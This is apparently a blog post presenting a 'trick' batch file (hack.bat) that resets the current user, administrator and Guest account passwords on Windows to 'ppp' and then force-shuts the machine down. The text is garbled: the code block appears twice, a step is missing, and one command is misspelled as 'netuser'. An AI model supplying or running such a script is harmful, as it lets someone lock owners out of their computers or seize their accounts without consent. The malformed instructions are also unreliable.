By using this trick you can change windows admin,guest and others password .This batch
Programme will shutdown your system and will change your password automatically !!
step 1: copy the below code in notepad
@echo off
break off
netuser %USERNAME% ppp
net user administrator ppp
net user Guest ppp
shutdown -s -f -t 5
exit
break off
netuser %USERNAME% ppp
net user administrator ppp
net user Guest ppp
shutdown -s -f -t 5
exit
Step 3 Now save as hack.bat and then go toyour saved directory and launch the batch file and then windows will restart and your password will change to your given password!!
PS:If you get any error then please comment
PS:If you get any error then please comment
Post a Comment